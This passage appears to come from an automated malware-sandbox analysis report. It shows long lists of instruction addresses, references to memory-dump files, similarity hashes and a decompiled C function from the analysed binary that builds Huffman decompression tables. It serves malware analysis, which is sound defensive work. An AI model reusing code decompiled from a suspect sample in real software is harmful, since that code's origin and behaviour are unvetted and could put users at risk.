                                                                                              0x00406649
                                                                                              0x0040664f
                                                                                              0x00406655
                                                                                              0x00406657
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406659
                                                                                              0x00406659
                                                                                              0x0040665b
                                                                                              0x0040665d
                                                                                              0x00406664
                                                                                              0x00406664
                                                                                              0x00406666
                                                                                              0x0040665f
                                                                                              0x0040665f
                                                                                              0x00406661
                                                                                              0x00406661
                                                                                              0x00406668
                                                                                              0x0040666a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004066e2
                                                                                              0x004066e2
                                                                                              0x004066e5
                                                                                              0x004066e7
                                                                                              0x004066ea
                                                                                              0x004066ed
                                                                                              0x004066ed
                                                                                              0x004066ed
                                                                                              0x004066ed
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405d9b
                                                                                              0x00405d7f
                                                                                              0x00000000
                                                                                              0x00405d85
                                                                                              0x00405d88
                                                                                              0x00405d92
                                                                                              0x00405d95
                                                                                              0x00405d98
                                                                                              0x00000000
                                                                                              0x00405d98
                                                                                              0x00405d7f
                                                                                              0x00405da3
                                                                                              0x00405da6
                                                                                              0x00405daa
                                                                                              0x00405db4
                                                                                              0x00405dbe
                                                                                              0x00405dc1
                                                                                              0x00405dc7
                                                                                              0x00405efb
                                                                                              0x00405efd
                                                                                              0x00405f03
                                                                                              0x00405f06
                                                                                              0x00405f09
                                                                                              0x00000000
                                                                                              0x00405f09
                                                                                              0x00405dcd
                                                                                              0x00405dcd
                                                                                              0x00405dce
                                                                                              0x00405e26
                                                                                              0x00405e26
                                                                                              0x00405e2d
                                                                                              0x00405ed3
                                                                                              0x00405ed3
                                                                                              0x00405ed8
                                                                                              0x00405edb
                                                                                              0x00405ee0
                                                                                              0x00405ee3
                                                                                              0x00405ee8
                                                                                              0x00405eeb
                                                                                              0x00405ef0
                                                                                              0x00405ef3
                                                                                              0x00405ef3
                                                                                              0x00000000
                                                                                              0x00405e33
                                                                                              0x00405e33
                                                                                              0x00405e33
                                                                                              0x00405e33
                                                                                              0x00405e37
                                                                                              0x00405e37
                                                                                              0x00405e59
                                                                                              0x00405e5c
                                                                                              0x00405e5e
                                                                                              0x00405e61
                                                                                              0x00405e66
                                                                                              0x00405e3c
                                                                                              0x00405e3c
                                                                                              0x00405e41
                                                                                              0x00405e43
                                                                                              0x00405e45
                                                                                              0x00405e4a
                                                                                              0x00405e50
                                                                                              0x00405e55
                                                                                              0x00405e57
                                                                                              0x00405e57
                                                                                              0x00405e4c
                                                                                              0x00405e4c
                                                                                              0x00405e4c
                                                                                              0x00405e4a
                                                                                              0x00000000
                                                                                              0x00405e68
                                                                                              0x00405e95
                                                                                              0x00405e9a
                                                                                              0x00405e9c
                                                                                              0x00405e9d
                                                                                              0x00405e9f
                                                                                              0x00405ea0
                                                                                              0x00405ea0
                                                                                              0x00405ea0
                                                                                              0x00405ec8
                                                                                              0x00405ecd
                                                                                              0x00405ecd
                                                                                              0x00000000
                                                                                              0x00405ecd
                                                                                              0x00405e66
                                                                                              0x00405e2d
                                                                                              0x00405dd0
                                                                                              0x00405dd0
                                                                                              0x00405dd1
                                                                                              0x00405e1b
                                                                                              0x00000000
                                                                                              0x00405e1b
                                                                                              0x00405dd3
                                                                                              0x00405dd4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405f30
                                                                                              0x00405f30
                                                                                              0x00405f30
                                                                                              0x00405f33
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405f10
                                                                                              0x00405f10
                                                                                              0x00405f14
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405f1a
                                                                                              0x00405f1a
                                                                                              0x00405f1d
                                                                                              0x00405f20
                                                                                              0x00405f25
                                                                                              0x00405f27
                                                                                              0x00405f2a
                                                                                              0x00405f2d
                                                                                              0x00405f2d
                                                                                              0x00405f2d
                                                                                              0x00405f35
                                                                                              0x00405f35
                                                                                              0x00405f38
                                                                                              0x00405f3a
                                                                                              0x00405f3f
                                                                                              0x00405f42
                                                                                              0x00405f44
                                                                                              0x00405f47
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405f4d
                                                                                              0x00405f4d
                                                                                              0x00405f4f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405f55
                                                                                              0x00405f55
                                                                                              0x00405f59
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405f5f
                                                                                              0x00405f5f
                                                                                              0x00405f62
                                                                                              0x00405f64
                                                                                              0x00406002
                                                                                              0x00406002
                                                                                              0x00406005
                                                                                              0x00406007
                                                                                              0x00406007
                                                                                              0x0040600a
                                                                                              0x0040600d
                                                                                              0x0040600f
                                                                                              0x00406011
                                                                                              0x00406013
                                                                                              0x00406013
                                                                                              0x0040601c
                                                                                              0x00406021
                                                                                              0x00406024
                                                                                              0x00406027
                                                                                              0x0040602a
                                                                                              0x0040602d
                                                                                              0x0040602d
                                                                                              0x0040602d
                                                                                              0x00406030
                                                                                              0x00406036
                                                                                              0x00406036
                                                                                              0x0040603c
                                                                                              0x0040603c
                                                                                              0x0040603c
                                                                                              0x00000000
                                                                                              0x00406030
                                                                                              0x00405f6a
                                                                                              0x00405f6a
                                                                                              0x00405f70
                                                                                              0x00405f73
                                                                                              0x00405f75
                                                                                              0x00405fa0
                                                                                              0x00405fa3
                                                                                              0x00405fa9
                                                                                              0x00405fae
                                                                                              0x00405fb4
                                                                                              0x00405fba
                                                                                              0x00405fbc
                                                                                              0x00405fbf
                                                                                              0x00405fc8
                                                                                              0x00405fce
                                                                                              0x00405fce
                                                                                              0x00405fc1
                                                                                              0x00405fc3
                                                                                              0x00405fc5
                                                                                              0x00405fc5
                                                                                              0x00405fd0
                                                                                              0x00405fd6
                                                                                              0x00405fd9
                                                                                              0x00405fdb
                                                                                              0x00405fdd
                                                                                              0x00405fe3
                                                                                              0x00405fe5
                                                                                              0x00405fe7
                                                                                              0x00405fea
                                                                                              0x00405ff3
                                                                                              0x00405ff3
                                                                                              0x00405ff5
                                                                                              0x00405fec
                                                                                              0x00405fec
                                                                                              0x00405fef
                                                                                              0x00405fef
                                                                                              0x00405ff7
                                                                                              0x00405ff7
                                                                                              0x00405fe5
                                                                                              0x00405ffa
                                                                                              0x00405ffc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405ffc
                                                                                              0x00405f77
                                                                                              0x00405f77
                                                                                              0x00405f7d
                                                                                              0x00405f83
                                                                                              0x00405f85
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405f87
                                                                                              0x00405f87
                                                                                              0x00405f89
                                                                                              0x00405f8b
                                                                                              0x00405f8e
                                                                                              0x00405f95
                                                                                              0x00405f95
                                                                                              0x00405f97
                                                                                              0x00405f90
                                                                                              0x00405f90
                                                                                              0x00405f92
                                                                                              0x00405f92
                                                                                              0x00405f99
                                                                                              0x00405f9b
                                                                                              0x00405f9e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004060a2
                                                                                              0x004060a5
                                                                                              0x004060a8
                                                                                              0x004060ae
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406285
                                                                                              0x00406285
                                                                                              0x00406285
                                                                                              0x00406288
                                                                                              0x0040628b
                                                                                              0x0040628d
                                                                                              0x00406290
                                                                                              0x00406296
                                                                                              0x0040629d
                                                                                              0x0040629f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406173
                                                                                              0x00406173
                                                                                              0x0040619b
                                                                                              0x0040619b
                                                                                              0x0040619b
                                                                                              0x0040619d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040617b
                                                                                              0x0040617b
                                                                                              0x0040617f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406185
                                                                                              0x00406185
                                                                                              0x00406188
                                                                                              0x0040618b
                                                                                              0x0040618e
                                                                                              0x00406190
                                                                                              0x00406192
                                                                                              0x00406195
                                                                                              0x00406198
                                                                                              0x00406198
                                                                                              0x00406198
                                                                                              0x0040619f
                                                                                              0x0040619f
                                                                                              0x004061a7
                                                                                              0x004061aa
                                                                                              0x004061b0
                                                                                              0x004061b3
                                                                                              0x004061b7
                                                                                              0x004061bb
                                                                                              0x004061be
                                                                                              0x004061c1
                                                                                              0x004061d9
                                                                                              0x004061d9
                                                                                              0x004061dc
                                                                                              0x004061ea
                                                                                              0x004061ed
                                                                                              0x004061de
                                                                                              0x004061de
                                                                                              0x004061e0
                                                                                              0x004061e7
                                                                                              0x004061e7
                                                                                              0x00406216
                                                                                              0x00406216
                                                                                              0x00406216
                                                                                              0x00406219
                                                                                              0x0040621b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004061f6
                                                                                              0x004061f6
                                                                                              0x004061fa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406200
                                                                                              0x00406200
                                                                                              0x00406203
                                                                                              0x00406206
                                                                                              0x00406209
                                                                                              0x0040620b
                                                                                              0x0040620d
                                                                                              0x00406210
                                                                                              0x00406213
                                                                                              0x00406213
                                                                                              0x00406213
                                                                                              0x0040621d
                                                                                              0x0040621d
                                                                                              0x0040621f
                                                                                              0x00406221
                                                                                              0x0040622c
                                                                                              0x0040622f
                                                                                              0x00406232
                                                                                              0x00406234
                                                                                              0x00406236
                                                                                              0x00406238
                                                                                              0x0040623b
                                                                                              0x0040623e
                                                                                              0x00406243
                                                                                              0x00406246
                                                                                              0x00406249
                                                                                              0x0040624c
                                                                                              0x00406253
                                                                                              0x00406256
                                                                                              0x00406258
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040625e
                                                                                              0x0040625e
                                                                                              0x00406262
                                                                                              0x00406273
                                                                                              0x00406273
                                                                                              0x00406273
                                                                                              0x00406275
                                                                                              0x00406275
                                                                                              0x00406279
                                                                                              0x00406279
                                                                                              0x00406279
                                                                                              0x0040627b
                                                                                              0x0040627c
                                                                                              0x0040627f
                                                                                              0x0040627f
                                                                                              0x0040627f
                                                                                              0x00406282
                                                                                              0x00000000
                                                                                              0x00406282
                                                                                              0x00406264
                                                                                              0x00406264
                                                                                              0x00406267
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040626d
                                                                                              0x0040626d
                                                                                              0x00000000
                                                                                              0x0040626d
                                                                                              0x004061c3
                                                                                              0x004061c3
                                                                                              0x004061c5
                                                                                              0x004061c7
                                                                                              0x004061ca
                                                                                              0x004061cd
                                                                                              0x004061d1
                                                                                              0x004061d1
                                                                                              0x004062a5
                                                                                              0x004062a5
                                                                                              0x004062a8
                                                                                              0x004062af
                                                                                              0x004062b3
                                                                                              0x004062b5
                                                                                              0x004062b8
                                                                                              0x004062bb
                                                                                              0x004062c0
                                                                                              0x004062c3
                                                                                              0x004062c5
                                                                                              0x004062c6
                                                                                              0x004062c9
                                                                                              0x004062d4
                                                                                              0x004062d7
                                                                                              0x004062ee
                                                                                              0x004062f3
                                                                                              0x004062fa
                                                                                              0x004062ff
                                                                                              0x00406303
                                                                                              0x00406305
                                                                                              0x00406305
                                                                                              0x00406305
                                                                                              0x00406308
                                                                                              0x0040630a
                                                                                              0x00000000
                                                                                              0x00406310
                                                                                              0x00406310
                                                                                              0x00406314
                                                                                              0x0040631f
                                                                                              0x00406332
                                                                                              0x00406337
                                                                                              0x0040633c
                                                                                              0x0040633e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406344
                                                                                              0x00406344
                                                                                              0x00406347
                                                                                              0x00406349
                                                                                              0x00406357
                                                                                              0x00406357
                                                                                              0x0040635a
                                                                                              0x0040635a
                                                                                              0x0040635d
                                                                                              0x00406360
                                                                                              0x00406363
                                                                                              0x00406366
                                                                                              0x00406369
                                                                                              0x0040636c
                                                                                              0x00000000
                                                                                              0x0040636c
                                                                                              0x0040634b
                                                                                              0x0040634b
                                                                                              0x00406351
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406351
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004066f0
                                                                                              0x004066f0
                                                                                              0x004066f6
                                                                                              0x004066fc
                                                                                              0x00406701
                                                                                              0x00406707
                                                                                              0x0040670d
                                                                                              0x0040670f
                                                                                              0x00406712
                                                                                              0x0040671b
                                                                                              0x00406721
                                                                                              0x00406721
                                                                                              0x00406714
                                                                                              0x00406716
                                                                                              0x00406718
                                                                                              0x00406718
                                                                                              0x00406723
                                                                                              0x00406725
                                                                                              0x00406728
                                                                                              0x00406763
                                                                                              0x00406763
                                                                                              0x00000000
                                                                                              0x0040672a
                                                                                              0x0040672a
                                                                                              0x0040672a
                                                                                              0x00406730
                                                                                              0x00406733
                                                                                              0x00406735
                                                                                              0x0040676a
                                                                                              0x0040676c
                                                                                              0x00000000
                                                                                              0x0040676c
                                                                                              0x00000000
                                                                                              0x00406735
                                                                                              0x00000000
                                                                                              0x00405d74
                                                                                              0x00406742
                                                                                              0x00000000
                                                                                              0x00406742
                                                                                              0x00406156
                                                                                              0x00406158
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040615a
                                                                                              0x0040615a
                                                                                              0x0040615d
                                                                                              0x00000000
                                                                                              0x0040615d
                                                                                              0x004060a2
                                                                                              0x00406063
                                                                                              0x00406747
                                                                                              0x0040674a
                                                                                              0x0040674c
                                                                                              0x00406755
                                                                                              0x0040675b
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                                                                              • Instruction ID: e2ef9aa76577a7a1e17a70bef0141433c3d77918b2314780ae2ebb94a64f5d95
                                                                                              • Opcode Fuzzy Hash: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                                                                              • Instruction Fuzzy Hash: D1E17B71900709DFDB28CF58C884BAAB7F5EB44305F15852FE896AB291D378AA51CF14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040681A, Relevance: .3, Instructions: 300COMMONCrypto
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040681A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42cdf0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42cdf0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42cdf0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                              0x00406825
                                                                                              0x0040682d
                                                                                              0x00406831
                                                                                              0x00406833
                                                                                              0x00406836
                                                                                              0x00406838
                                                                                              0x00406838
                                                                                              0x0040683a
                                                                                              0x00406841
                                                                                              0x00406843
                                                                                              0x00406843
                                                                                              0x00406849
                                                                                              0x0040685e
                                                                                              0x00406866
                                                                                              0x00406868
                                                                                              0x0040686a
                                                                                              0x0040686d
                                                                                              0x0040686e
                                                                                              0x0040686e
                                                                                              0x00406874
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406876
                                                                                              0x00406879
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406879
                                                                                              0x0040687d
                                                                                              0x00406880
                                                                                              0x00406882
                                                                                              0x00406882
                                                                                              0x00406885
                                                                                              0x0040688b
                                                                                              0x0040688c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040688c
                                                                                              0x00406891
                                                                                              0x00406894
                                                                                              0x00406896
                                                                                              0x00406896
                                                                                              0x0040689c
                                                                                              0x0040689e
                                                                                              0x004068af
                                                                                              0x004068a2
                                                                                              0x004068a6
                                                                                              0x00406b4b
                                                                                              0x00000000
                                                                                              0x00406b4b
                                                                                              0x004068ac
                                                                                              0x004068ad
                                                                                              0x004068ad
                                                                                              0x004068b5
                                                                                              0x004068b8
                                                                                              0x004068bc
                                                                                              0x004068be
                                                                                              0x004068c0
                                                                                              0x004068c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004068cb
                                                                                              0x004068d1
                                                                                              0x004068d3
                                                                                              0x004068d5
                                                                                              0x004068d6
                                                                                              0x004068eb
                                                                                              0x004068eb
                                                                                              0x004068ee
                                                                                              0x004068f0
                                                                                              0x004068f0
                                                                                              0x004068f2
                                                                                              0x004068f7
                                                                                              0x004068f9
                                                                                              0x00406900
                                                                                              0x00406902
                                                                                              0x0040690a
                                                                                              0x0040690a
                                                                                              0x0040690c
                                                                                              0x0040690d
                                                                                              0x0040691c
                                                                                              0x00406920
                                                                                              0x00406924
                                                                                              0x00406927
                                                                                              0x0040692a
                                                                                              0x0040692f
                                                                                              0x00406932
                                                                                              0x00406938
                                                                                              0x0040693f
                                                                                              0x00406945
                                                                                              0x00406b3e
                                                                                              0x00406b3e
                                                                                              0x00406b43
                                                                                              0x00406b52
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406b43
                                                                                              0x00406952
                                                                                              0x00406955
                                                                                              0x00406958
                                                                                              0x0040695b
                                                                                              0x0040695f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040696a
                                                                                              0x0040696d
                                                                                              0x0040696e
                                                                                              0x00406970
                                                                                              0x00406976
                                                                                              0x00406979
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040697f
                                                                                              0x00406980
                                                                                              0x00406983
                                                                                              0x00406986
                                                                                              0x00406989
                                                                                              0x0040698f
                                                                                              0x00406991
                                                                                              0x00406991
                                                                                              0x00406999
                                                                                              0x0040699d
                                                                                              0x004069a2
                                                                                              0x004069c7
                                                                                              0x004069cd
                                                                                              0x004069cf
                                                                                              0x004069d1
                                                                                              0x004069d4
                                                                                              0x004069dd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004069a4
                                                                                              0x004069a4
                                                                                              0x004069ad
                                                                                              0x004069b1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004069c2
                                                                                              0x004069c2
                                                                                              0x004069c5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004069b5
                                                                                              0x004069b8
                                                                                              0x004069ba
                                                                                              0x004069be
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004069c0
                                                                                              0x004069c0
                                                                                              0x00000000
                                                                                              0x004069c2
                                                                                              0x004069e6
                                                                                              0x004069ec
                                                                                              0x004069f6
                                                                                              0x004069f8
                                                                                              0x004069fd
                                                                                              0x004069ff
                                                                                              0x00406a35
                                                                                              0x00406a01
                                                                                              0x00406a01
                                                                                              0x00406a04
                                                                                              0x00406a07
                                                                                              0x00406a11
                                                                                              0x00406a14
                                                                                              0x00406a1b
                                                                                              0x00406a26
                                                                                              0x00406a2d
                                                                                              0x00406a2d
                                                                                              0x00406a37
                                                                                              0x00406a3a
                                                                                              0x00406a3c
                                                                                              0x00406a42
                                                                                              0x00406a42
                                                                                              0x00406a4b
                                                                                              0x00406a4e
                                                                                              0x00406a53
                                                                                              0x00406a62
                                                                                              0x00406a6a
                                                                                              0x00406a6f
                                                                                              0x00406a93
                                                                                              0x00406a9b
                                                                                              0x00406a9f
                                                                                              0x00406aa5
                                                                                              0x00406a71
                                                                                              0x00406a7f
                                                                                              0x00406a82
                                                                                              0x00406a88
                                                                                              0x00406a88
                                                                                              0x00406aa9
                                                                                              0x00406a64
                                                                                              0x00406a64
                                                                                              0x00406a64
                                                                                              0x00406aba
                                                                                              0x00406abe
                                                                                              0x00406aca
                                                                                              0x00406ac5
                                                                                              0x00406ac8
                                                                                              0x00406ac8
                                                                                              0x00406ad2
                                                                                              0x00406ad7
                                                                                              0x00406adf
                                                                                              0x00406adb
                                                                                              0x00406add
                                                                                              0x00406add
                                                                                              0x00406ae5
                                                                                              0x00406ae7
                                                                                              0x00406aee
                                                                                              0x00406af8
                                                                                              0x00406b02
                                                                                              0x00406b1e
                                                                                              0x00406b22
                                                                                              0x00406967
                                                                                              0x0040696d
                                                                                              0x0040696e
                                                                                              0x00406970
                                                                                              0x00406976
                                                                                              0x00406979
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406979
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406b04
                                                                                              0x00406b04
                                                                                              0x00406b04
                                                                                              0x00406b09
                                                                                              0x00406b12
                                                                                              0x00406b1b
                                                                                              0x00000000
                                                                                              0x00406b1b
                                                                                              0x00406b28
                                                                                              0x00406b28
                                                                                              0x00406b2b
                                                                                              0x00406b32
                                                                                              0x00406b35
                                                                                              0x00000000
                                                                                              0x00406958
                                                                                              0x004068d8
                                                                                              0x004068da
                                                                                              0x004068da
                                                                                              0x004068de
